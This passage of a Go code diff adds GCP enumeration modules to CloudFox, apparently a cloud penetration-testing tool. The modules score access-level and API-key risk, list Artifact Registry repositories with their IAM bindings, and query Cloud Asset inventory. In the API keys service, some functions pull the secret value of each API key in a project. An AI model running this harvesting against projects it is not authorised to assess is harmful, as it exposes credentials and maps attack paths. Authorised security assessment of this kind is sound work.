dp.OsConstraints { + condInfo.DevicePolicy.OSConstraints = append(condInfo.DevicePolicy.OSConstraints, + fmt.Sprintf("%s:%s", os.OsType, os.MinimumVersion)) + } + } + + info.Conditions = append(info.Conditions, condInfo) + } + } + + // Parse custom level + if level.Custom != nil && level.Custom.Expr != nil { + info.HasCustomLevel = true + info.CustomExpression = level.Custom.Expr.Expression + } + + info.RiskLevel, info.RiskReasons = s.analyzeAccessLevelRisk(info) + + return info +} + +func (s *AccessPolicyService) analyzeAccessLevelRisk(level AccessLevelInfo) (string, []string) { + var reasons []string + score := 0 + + for _, condition := range level.Conditions { + // Check for overly broad IP ranges + for _, ip := range condition.IPSubnetworks { + if ip == "0.0.0.0/0" || ip == "::/0" { + reasons = append(reasons, "Access level allows all IP addresses (0.0.0.0/0)") + score += 3 + break + } + } + + // Check for allUsers or allAuthenticatedUsers + for _, member := range condition.Members { + if member == "allUsers" { + reasons = append(reasons, "Access level includes allUsers") + score += 3 + } else if member == "allAuthenticatedUsers" { + reasons = append(reasons, "Access level includes allAuthenticatedUsers") + score += 2 + } + } + + // No device policy requirements + if condition.DevicePolicy == nil { + reasons = append(reasons, "No device policy requirements") + score += 1 + } else { + // Weak device policy + if !condition.DevicePolicy.RequireScreenLock { + reasons = append(reasons, "Does not require screen lock") + score += 1 + } + if !condition.DevicePolicy.RequireCorpOwned { + reasons = append(reasons, "Does not require corporate-owned device") + score += 1 + } + } + } + + // No conditions at all + if len(level.Conditions) == 0 && !level.HasCustomLevel { + reasons = append(reasons, "Access level has no conditions defined") + score += 2 + } + + // OR combining function is more permissive + if level.CombiningFunction == "OR" && len(level.Conditions) > 1 { + reasons = append(reasons, "Uses OR combining function (any condition grants access)") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractPolicyName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLevelName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/apikeysService/apikeysService.go b/gcp/services/apikeysService/apikeysService.go new file mode 100644 index 00000000..bd1c4550 --- /dev/null +++ b/gcp/services/apikeysService/apikeysService.go @@ -0,0 +1,324 @@ +package apikeysservice + +import ( + "context" + "fmt" + "strings" + "time" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + apikeys "google.golang.org/api/apikeys/v2" + "google.golang.org/api/option" +) + +var logger internal.Logger + +type APIKeysService struct { + session *gcpinternal.SafeSession +} + +// New creates a new APIKeysService +func New() *APIKeysService { + return &APIKeysService{} +} + +// NewWithSession creates an APIKeysService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *APIKeysService { + return &APIKeysService{session: session} +} + +// getClientOption returns the appropriate client option based on session +func (s *APIKeysService) getClientOption() option.ClientOption { + if s.session != nil { + return s.session.GetClientOption() + } + return nil +} + +// APIKeyInfo represents information about an API key +type APIKeyInfo struct { + Name string `json:"name"` // Full resource name + UID string `json:"uid"` // Unique identifier + DisplayName string `json:"displayName"` // User-friendly name + KeyString string `json:"keyString"` // The actual key value (if accessible) + ProjectID string `json:"projectId"` + CreateTime time.Time `json:"createTime"` + UpdateTime time.Time `json:"updateTime"` + DeleteTime time.Time `json:"deleteTime"` + Annotations map[string]string `json:"annotations"` + + // Restrictions + HasRestrictions bool `json:"hasRestrictions"` + AllowedAPIs []string `json:"allowedApis"` // API targets + AllowedReferers []string `json:"allowedReferers"` // HTTP referer restrictions + AllowedIPs []string `json:"allowedIps"` // IP restrictions + AllowedAndroidApps []string `json:"allowedAndroidApps"` // Android app restrictions + AllowedIOSApps []string `json:"allowedIosApps"` // iOS app restrictions + RestrictionType string `json:"restrictionType"` // "browser", "server", "android", "ios", "none" + + // Security Analysis + IsUnrestricted bool `json:"isUnrestricted"` // No restrictions at all + RiskLevel string `json:"riskLevel"` // HIGH, MEDIUM, LOW + RiskReasons []string `json:"riskReasons"` +} + +// ListAPIKeys retrieves all API keys in a project +func (s *APIKeysService) ListAPIKeys(projectID string) ([]APIKeyInfo, error) { + ctx := context.Background() + var service *apikeys.Service + var err error + + if s.session != nil { + service, err = apikeys.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = apikeys.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + var keys []APIKeyInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Keys.List(parent) + err = req.Pages(ctx, func(page *apikeys.V2ListKeysResponse) error { + for _, key := range page.Keys { + keyInfo := s.parseAPIKey(key, projectID) + keys = append(keys, keyInfo) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + return keys, nil +} + +// GetAPIKey retrieves a single API key with its key string +func (s *APIKeysService) GetAPIKey(keyName string) (*APIKeyInfo, error) { + ctx := context.Background() + var service *apikeys.Service + var err error + + if s.session != nil { + service, err = apikeys.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = apikeys.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + key, err := service.Projects.Locations.Keys.Get(keyName).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + // Extract project ID from key name + // Format: projects/{project}/locations/global/keys/{key} + parts := strings.Split(keyName, "/") + projectID := "" + if len(parts) >= 2 { + projectID = parts[1] + } + + keyInfo := s.parseAPIKey(key, projectID) + return &keyInfo, nil +} + +// GetKeyString retrieves the key string value for an API key +func (s *APIKeysService) GetKeyString(keyName string) (string, error) { + ctx := context.Background() + var service *apikeys.Service + var err error + + if s.session != nil { + service, err = apikeys.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = apikeys.NewService(ctx) + } + if err != nil { + return "", gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + resp, err := service.Projects.Locations.Keys.GetKeyString(keyName).Context(ctx).Do() + if err != nil { + return "", gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + return resp.KeyString, nil +} + +// parseAPIKey converts an API key response to APIKeyInfo +func (s *APIKeysService) parseAPIKey(key *apikeys.V2Key, projectID string) APIKeyInfo { + info := APIKeyInfo{ + Name: key.Name, + UID: key.Uid, + DisplayName: key.DisplayName, + ProjectID: projectID, + Annotations: key.Annotations, + RiskReasons: []string{}, + } + + // Parse times + if key.CreateTime != "" { + if t, err := time.Parse(time.RFC3339, key.CreateTime); err == nil { + info.CreateTime = t + } + } + if key.UpdateTime != "" { + if t, err := time.Parse(time.RFC3339, key.UpdateTime); err == nil { + info.UpdateTime = t + } + } + if key.DeleteTime != "" { + if t, err := time.Parse(time.RFC3339, key.DeleteTime); err == nil { + info.DeleteTime = t + } + } + + // Parse restrictions + if key.Restrictions != nil { + info.HasRestrictions = true + + // API restrictions + if key.Restrictions.ApiTargets != nil { + for _, target := range key.Restrictions.ApiTargets { + info.AllowedAPIs = append(info.AllowedAPIs, target.Service) + } + } + + // Browser restrictions (HTTP referers) + if key.Restrictions.BrowserKeyRestrictions != nil { + info.RestrictionType = "browser" + info.AllowedReferers = key.Restrictions.BrowserKeyRestrictions.AllowedReferrers + } + + // Server restrictions (IPs) + if key.Restrictions.ServerKeyRestrictions != nil { + info.RestrictionType = "server" + info.AllowedIPs = key.Restrictions.ServerKeyRestrictions.AllowedIps + } + + // Android restrictions + if key.Restrictions.AndroidKeyRestrictions != nil { + info.RestrictionType = "android" + for _, app := range key.Restrictions.AndroidKeyRestrictions.AllowedApplications { + info.AllowedAndroidApps = append(info.AllowedAndroidApps, + fmt.Sprintf("%s:%s", app.PackageName, app.Sha1Fingerprint)) + } + } + + // iOS restrictions + if key.Restrictions.IosKeyRestrictions != nil { + info.RestrictionType = "ios" + info.AllowedIOSApps = key.Restrictions.IosKeyRestrictions.AllowedBundleIds + } + + // Check if truly restricted + if len(info.AllowedAPIs) == 0 && + len(info.AllowedReferers) == 0 && + len(info.AllowedIPs) == 0 && + len(info.AllowedAndroidApps) == 0 && + len(info.AllowedIOSApps) == 0 { + info.HasRestrictions = false + info.IsUnrestricted = true + } + } else { + info.IsUnrestricted = true + info.RestrictionType = "none" + } + + // Security analysis + info.RiskLevel, info.RiskReasons = s.analyzeAPIKeyRisk(info) + + return info +} + +// analyzeAPIKeyRisk determines the risk level of an API key +func (s *APIKeysService) analyzeAPIKeyRisk(key APIKeyInfo) (string, []string) { + var reasons []string + score := 0 + + // Unrestricted keys are high risk + if key.IsUnrestricted { + reasons = append(reasons, "No restrictions applied - key can be used from anywhere") + score += 4 + } + + // No API restrictions + if len(key.AllowedAPIs) == 0 && !key.IsUnrestricted { + reasons = append(reasons, "No API restrictions - key can access all enabled APIs") + score += 2 + } + + // Overly permissive API access + for _, api := range key.AllowedAPIs { + if strings.Contains(api, "admin") || strings.Contains(api, "iam") { + reasons = append(reasons, fmt.Sprintf("Has access to sensitive API: %s", api)) + score += 2 + } + } + + // Wildcard in referers + for _, referer := range key.AllowedReferers { + if referer == "*" || referer == "*.com" { + reasons = append(reasons, fmt.Sprintf("Overly permissive referer: %s", referer)) + score += 2 + } + } + + // 0.0.0.0/0 in IPs + for _, ip := range key.AllowedIPs { + if ip == "0.0.0.0/0" || ip == "::/0" { + reasons = append(reasons, "Allows access from any IP (0.0.0.0/0)") + score += 3 + } + } + + // Old keys + if !key.CreateTime.IsZero() { + age := time.Since(key.CreateTime) + if age > 365*24*time.Hour { + reasons = append(reasons, fmt.Sprintf("Key is older than 1 year (%d days)", int(age.Hours()/24))) + score += 1 + } + } + + // Determine risk level + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + + return "INFO", reasons +} + +// ListAPIKeysWithKeyStrings retrieves all API keys with their key strings +func (s *APIKeysService) ListAPIKeysWithKeyStrings(projectID string) ([]APIKeyInfo, error) { + keys, err := s.ListAPIKeys(projectID) + if err != nil { + return nil, err + } + + // Try to get key strings for each key + for i := range keys { + keyString, err := s.GetKeyString(keys[i].Name) + if err != nil { + // Log but don't fail - we might not have permission + parsedErr := gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_APIKEYS_MODULE_NAME, + fmt.Sprintf("Could not get key string for %s", keys[i].Name)) + } else { + keys[i].KeyString = keyString + } + } + + return keys, nil +} diff --git a/gcp/services/artifactRegistryService/artifactRegistryService.go b/gcp/services/artifactRegistryService/artifactRegistryService.go index 60aed147..541e634b 100644 --- a/gcp/services/artifactRegistryService/artifactRegistryService.go +++ b/gcp/services/artifactRegistryService/artifactRegistryService.go @@ -3,15 +3,19 @@ package artifactregistryservice import ( "context" "fmt" + "net/url" "strings" + "time" artifactregistry "cloud.google.com/go/artifactregistry/apiv1" artifactregistrypb "cloud.google.com/go/artifactregistry/apiv1/artifactregistrypb" "github.com/BishopFox/cloudfox/gcp/services/models" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/googleapis/gax-go/v2" "google.golang.org/api/iterator" + iampb "google.golang.org/genproto/googleapis/iam/v1" locationpb "google.golang.org/genproto/googleapis/cloud/location" ) @@ -32,11 +36,49 @@ func New(client *artifactregistry.Client) ArtifactRegistryService { DockerImageLister: func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] { return client.ListDockerImages(ctx, req, opts...) }, + RawClient: client, }, } return ars } +// NewWithSession creates an ArtifactRegistryService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) (ArtifactRegistryService, error) { + ctx := context.Background() + var client *artifactregistry.Client + var err error + + if session != nil { + client, err = artifactregistry.NewClient(ctx, session.GetClientOption()) + } else { + client, err = artifactregistry.NewClient(ctx) + } + if err != nil { + return ArtifactRegistryService{}, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") + } + + ars := ArtifactRegistryService{ + Client: &ArtifactRegistryClientWrapper{ + Closer: client.Close, + RepositoryLister: func(ctx context.Context, req *artifactregistrypb.ListRepositoriesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.Repository] { + return client.ListRepositories(ctx, req, opts...) + }, + LocationLister: func(ctx context.Context, req *locationpb.ListLocationsRequest, opts ...gax.CallOption) models.GenericIterator[locationpb.Location] { + return client.ListLocations(ctx, req, opts...) + }, + RepositoryGetter: func(ctx context.Context, req *artifactregistrypb.GetRepositoryRequest, opts ...gax.CallOption) (*artifactregistrypb.Repository, error) { + return client.GetRepository(ctx, req, opts...) + }, + DockerImageLister: func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] { + return client.ListDockerImages(ctx, req, opts...) + }, + RawClient: client, + }, + Session: session, + } + return ars, nil +} + var logger internal.Logger // RepositoriesAndArtifacts retrieves both repositories and their artifacts for a given projectID. @@ -46,7 +88,7 @@ func (ars *ArtifactRegistryService) RepositoriesAndArtifacts(projectID string) ( // Retrieve repositories. repos, err := ars.Repositories(projectID) if err != nil { - return combinedInfo, fmt.Errorf("failed to retrieve repositories: %v", err) + return combinedInfo, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } combinedInfo.Repositories = repos @@ -64,7 +106,9 @@ func (ars *ArtifactRegistryService) RepositoriesAndArtifacts(projectID string) ( // Fetch artifacts for the current repository. artifacts, err := ars.Artifacts(projectID, location, repositoryName) if err != nil { - logger.InfoM(fmt.Sprintf("Failed to retrieve artifacts for repository %s: %v", repositoryName, err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, + fmt.Sprintf("Failed to retrieve artifacts for repository %s", repositoryName)) continue // Optionally continue to the next repository or handle error differently. } combinedInfo.Artifacts = append(combinedInfo.Artifacts, artifacts...) @@ -100,20 +144,110 @@ func (ars *ArtifactRegistryService) Repositories(projectID string) ([]Repository return nil, err } - repositories = append(repositories, RepositoryInfo{ - Name: repo.Name, - Format: repo.Format.String(), - Description: repo.Description, - SizeBytes: fmt.Sprintf("%d", repo.SizeBytes), - ProjectID: projectID, - Location: location, - }) + repoInfo := RepositoryInfo{ + Name: repo.Name, + Format: repo.Format.String(), + Description: repo.Description, + SizeBytes: fmt.Sprintf("%d", repo.SizeBytes), + ProjectID: projectID, + Location: location, + Mode: repo.Mode.String(), + Labels: repo.Labels, + RegistryType: "artifact-registry", + } + + // Parse encryption + if repo.KmsKeyName != "" { + repoInfo.EncryptionType = "CMEK" + repoInfo.KMSKeyName = repo.KmsKeyName + } else { + repoInfo.EncryptionType = "Google-managed" + } + + // Parse cleanup policies + if repo.CleanupPolicies != nil { + repoInfo.CleanupPolicies = len(repo.CleanupPolicies) + } + + // Parse timestamps + if repo.CreateTime != nil { + repoInfo.CreateTime = repo.CreateTime.AsTime().Format(time.RFC3339) + } + if repo.UpdateTime != nil { + repoInfo.UpdateTime = repo.UpdateTime.AsTime().Format(time.RFC3339) + } + + // Get IAM policy for the repository + iamBindings, isPublic, publicAccess := ars.getRepositoryIAMPolicy(ctx, repo.Name) + repoInfo.IAMBindings = iamBindings + repoInfo.IsPublic = isPublic + repoInfo.PublicAccess = publicAccess + + repositories = append(repositories, repoInfo) } } return repositories, nil } +// getRepositoryIAMPolicy retrieves the IAM policy for a repository +func (ars *ArtifactRegistryService) getRepositoryIAMPolicy(ctx context.Context, repoName string) ([]IAMBinding, bool, string) { + var bindings []IAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + // Get raw client for IAM operations + client, ok := ars.Client.RawClient.(*artifactregistry.Client) + if !ok || client == nil { + return bindings, false, "Unknown" + } + + // Get IAM policy + req := &iampb.GetIamPolicyRequest{ + Resource: repoName, + } + + policy, err := client.GetIamPolicy(ctx, req) + if err != nil { + // Return empty bindings if we can't get the policy + return bindings, false, "Unknown" + } + + // Convert IAM policy to our binding format + for _, binding := range policy.Bindings { + iamBinding := IAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + bindings = append(bindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" { + hasAllUsers = true + isPublic = true + } + if member == "allAuthenticatedUsers" { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + // Artifacts fetches the artifacts for a given repository, handling different formats. func (ars *ArtifactRegistryService) Artifacts(projectID string, location string, repositoryName string) ([]ArtifactInfo, error) { ctx := context.Background() @@ -128,7 +262,7 @@ func (ars *ArtifactRegistryService) Artifacts(projectID string, location string, // Fetch repository details to determine its format repo, err := ars.Client.GetRepository(ctx, &artifactregistrypb.GetRepositoryRequest{Name: repoFullName}) if err != nil { - return nil, fmt.Errorf("failed to get repository details: %v", err) + return nil, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } // Handle different repository formats @@ -161,11 +295,17 @@ func parseDockerImageName(imageName string) DockerImageDetails { imageName = imageAndDigest[0] digest := imageAndDigest[1] + // URL-decode the image name (e.g., "library%2Fnginx" -> "library/nginx") + decodedImageName, err := url.PathUnescape(imageName) + if err != nil { + decodedImageName = imageName // fallback to original if decode fails + } + return DockerImageDetails{ ProjectID: projectID, Location: location, Repository: repository, - ImageName: imageName, + ImageName: decodedImageName, Digest: digest, } } @@ -192,17 +332,38 @@ func (ars *ArtifactRegistryService) DockerImages(repositoryName string) ([]Artif // Parse image name to extract detailed information. details := parseDockerImageName(image.Name) - // Populate the ArtifactInfo structure with Docker image details. - artifacts = append(artifacts, ArtifactInfo{ + // Build version from tags or digest + version := details.Digest + if len(image.Tags) > 0 { + version = image.Tags[0] // Use first tag as version + } + + artifact := ArtifactInfo{ Name: details.ImageName, Format: "DOCKER", Location: details.Location, Repository: details.Repository, SizeBytes: fmt.Sprintf("%d", image.ImageSizeBytes), - Updated: image.UpdateTime.AsTime().String(), Digest: details.Digest, ProjectID: details.ProjectID, - }) + Tags: image.Tags, + MediaType: image.MediaType, + URI: image.Uri, + Version: version, + } + + // Parse timestamps + if image.UpdateTime != nil { + artifact.Updated = image.UpdateTime.AsTime().Format(time.RFC3339) + } + if image.UploadTime != nil { + artifact.Uploaded = image.UploadTime.AsTime().Format(time.RFC3339) + } + if image.BuildTime != nil { + artifact.BuildTime = image.BuildTime.AsTime().Format(time.RFC3339) + } + + artifacts = append(artifacts, artifact) } return artifacts, nil @@ -227,10 +388,80 @@ func (ars *ArtifactRegistryService) projectLocations(projectID string) ([]string break } if err != nil { - return nil, fmt.Errorf("failed to list locations: %w", err) + return nil, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } locations = append(locations, loc.LocationId) } return locations, nil } + +// ContainerRegistryRepositories enumerates legacy Container Registry (gcr.io) repositories +// Container Registry stores images in Cloud Storage buckets, so we check for those buckets +func (ars *ArtifactRegistryService) ContainerRegistryRepositories(projectID string) []RepositoryInfo { + var repositories []RepositoryInfo + + // Container Registry uses specific bucket naming conventions: + // - gcr.io -> artifacts.{project-id}.appspot.com (us multi-region) + // - us.gcr.io -> us.artifacts.{project-id}.appspot.com + // - eu.gcr.io -> eu.artifacts.{project-id}.appspot.com + // - asia.gcr.io -> asia.artifacts.{project-id}.appspot.com + + gcrLocations := []struct { + hostname string + location string + }{ + {"gcr.io", "us"}, + {"us.gcr.io", "us"}, + {"eu.gcr.io", "eu"}, + {"asia.gcr.io", "asia"}, + } + + for _, gcr := range gcrLocations { + // Create a repository entry for potential GCR location + // Note: We can't easily verify if the bucket exists without storage API access + // This creates potential entries that the command can verify + repo := RepositoryInfo{ + Name: fmt.Sprintf("%s/%s", gcr.hostname, projectID), + Format: "DOCKER", + Description: fmt.Sprintf("Legacy Container Registry at %s", gcr.hostname), + ProjectID: projectID, + Location: gcr.location, + Mode: "STANDARD_REPOSITORY", + EncryptionType: "Google-managed", + RegistryType: "container-registry", + PublicAccess: "Unknown", // Would need storage bucket IAM check + } + repositories = append(repositories, repo) + } + + return repositories +} + +// getMemberType extracts the member type from a GCP IAM member string +func GetMemberType(member string) string { + switch { + case member == "allUsers": + return "PUBLIC" + case member == "allAuthenticatedUsers": + return "ALL_AUTHENTICATED" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return "ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "projectOwner:"): + return "ProjectOwner" + case strings.HasPrefix(member, "projectEditor:"): + return "ProjectEditor" + case strings.HasPrefix(member, "projectViewer:"): + return "ProjectViewer" + case strings.HasPrefix(member, "deleted:"): + return "Deleted" + default: + return "Unknown" + } +} diff --git a/gcp/services/artifactRegistryService/models.go b/gcp/services/artifactRegistryService/models.go index 24f3ca37..92253a2d 100644 --- a/gcp/services/artifactRegistryService/models.go +++ b/gcp/services/artifactRegistryService/models.go @@ -5,6 +5,7 @@ import ( artifactregistrypb "cloud.google.com/go/artifactregistry/apiv1/artifactregistrypb" "github.com/BishopFox/cloudfox/gcp/services/models" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/googleapis/gax-go/v2" locationpb "google.golang.org/genproto/googleapis/cloud/location" ) @@ -15,27 +16,58 @@ type CombinedRepoArtifactInfo struct { Artifacts []ArtifactInfo `json:"artifacts"` } +// IAMBinding represents a single IAM binding on a repository +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + // ArtifactInfo represents the basic information of an artifact within a registry. type ArtifactInfo struct { - Name string `json:"name"` - Format string `json:"format"` - Version string `json:"version"` - Location string `json:"location"` - Repository string `json:"repository"` - SizeBytes string `json:"virtualSize"` - Updated string `json:"updated"` - Digest string `json:"digest"` - ProjectID string `json:"projectID"` + Name string `json:"name"` + Format string `json:"format"` + Version string `json:"version"` + Location string `json:"location"` + Repository string `json:"repository"` + SizeBytes string `json:"virtualSize"` + Updated string `json:"updated"` + Uploaded string `json:"uploaded"` + BuildTime string `json:"buildTime"` + Digest string `json:"digest"` + ProjectID string `json:"projectID"` + Tags []string `json:"tags"` + MediaType string `json:"mediaType"` + URI string `json:"uri"` } // RepositoryInfo holds information about a repository and its artifacts. type RepositoryInfo struct { + // Basic info Name string `json:"name"` Format string `json:"format"` Description string `json:"description"` SizeBytes string `json:"sizeBytes"` ProjectID string `json:"projectID"` Location string `json:"location"` + + // Security-relevant fields + Mode string `json:"mode"` // STANDARD_REPOSITORY, VIRTUAL_REPOSITORY, REMOTE_REPOSITORY + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + CleanupPolicies int `json:"cleanupPolicies"` // Number of cleanup policies + Labels map[string]string `json:"labels"` + + // Timestamps + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings"` + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" + + // Registry type (for differentiating AR vs GCR) + RegistryType string `json:"registryType"` // "artifact-registry" or "container-registry" } // DockerImageDetails holds the extracted parts from a Docker image name. @@ -54,6 +86,7 @@ type ArtifactRegistryClientWrapper struct { LocationLister func(ctx context.Context, req *locationpb.ListLocationsRequest, opts ...gax.CallOption) models.GenericIterator[locationpb.Location] RepositoryGetter func(ctx context.Context, req *artifactregistrypb.GetRepositoryRequest, opts ...gax.CallOption) (*artifactregistrypb.Repository, error) DockerImageLister func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] + RawClient interface{} // Store raw client for IAM operations } func (w *ArtifactRegistryClientWrapper) ListRepositories(ctx context.Context, req *artifactregistrypb.ListRepositoriesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.Repository] { @@ -74,5 +107,6 @@ func (w *ArtifactRegistryClientWrapper) ListDockerImages(ctx context.Context, re // ArtifactRegistryService provides methods to interact with Artifact Registry resources. type ArtifactRegistryService struct { - Client *ArtifactRegistryClientWrapper + Client *ArtifactRegistryClientWrapper + Session *gcpinternal.SafeSession } diff --git a/gcp/services/assetService/assetService.go b/gcp/services/assetService/assetService.go new file mode 100644 index 00000000..f56441f0 --- /dev/null +++ b/gcp/services/assetService/assetService.go @@ -0,0 +1,333 @@ +package assetservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + asset "cloud.google.com/go/asset/apiv1" + assetpb "cloud.google.com/go/asset/apiv1/assetpb" + "google.golang.org/api/iterator" +) + +type AssetService struct { + session *gcpinternal.SafeSession +} + +func New() *AssetService { + return &AssetService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *AssetService { + return &AssetService{session: session} +} + +// IAMBinding represents an IAM binding +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// AssetInfo represents a Cloud Asset +type AssetInfo struct { + Name string `json:"name"` + AssetType string `json:"assetType"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Labels map[string]string `json:"labels"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // IAM Policy details + HasIAMPolicy bool `json:"hasIamPolicy"` + IAMBindings []IAMBinding `json:"iamBindings"` + IAMBindingCount int `json:"iamBindingCount"` + PublicAccess bool `json:"publicAccess"` +} + +// AssetTypeCount tracks count of assets by type +type AssetTypeCount struct { + AssetType string `json:"assetType"` + Count int `json:"count"` +} + +// Common asset types for filtering +var CommonAssetTypes = []string{ + "compute.googleapis.com/Instance", + "compute.googleapis.com/Disk", + "compute.googleapis.com/Firewall", + "compute.googleapis.com/Network", + "compute.googleapis.com/Subnetwork", + "storage.googleapis.com/Bucket", + "iam.googleapis.com/ServiceAccount", + "iam.googleapis.com/ServiceAccountKey", + "secretmanager.googleapis.com/Secret", + "cloudkms.googleapis.com/CryptoKey", + "cloudfunctions.googleapis.com/Function", + "run.googleapis.com/Service", + "container.googleapis.com/Cluster", + "sqladmin.googleapis.com/Instance", + "pubsub.googleapis.com/Topic", + "pubsub.googleapis.com/Subscription", + "bigquery.googleapis.com/Dataset", + "bigquery.googleapis.com/Table", +} + +// ListAssets retrieves assets for a project, optionally filtered by type +func (s *AssetService) ListAssets(projectID string, assetTypes []string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + var assets []AssetInfo + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + } + + if len(assetTypes) > 0 { + req.AssetTypes = assetTypes + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + info := s.parseAsset(assetResult, projectID) + assets = append(assets, info) + } + + return assets, nil +} + +// ListAssetsWithIAM retrieves assets with their IAM policies +func (s *AssetService) ListAssetsWithIAM(projectID string, assetTypes []string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + var assets []AssetInfo + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_IAM_POLICY, + } + + if len(assetTypes) > 0 { + req.AssetTypes = assetTypes + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + info := s.parseAssetWithIAM(assetResult, projectID) + assets = append(assets, info) + } + + return assets, nil +} + +// GetAssetTypeCounts returns a summary of asset counts by type +func (s *AssetService) GetAssetTypeCounts(projectID string) ([]AssetTypeCount, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + counts := make(map[string]int) + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, 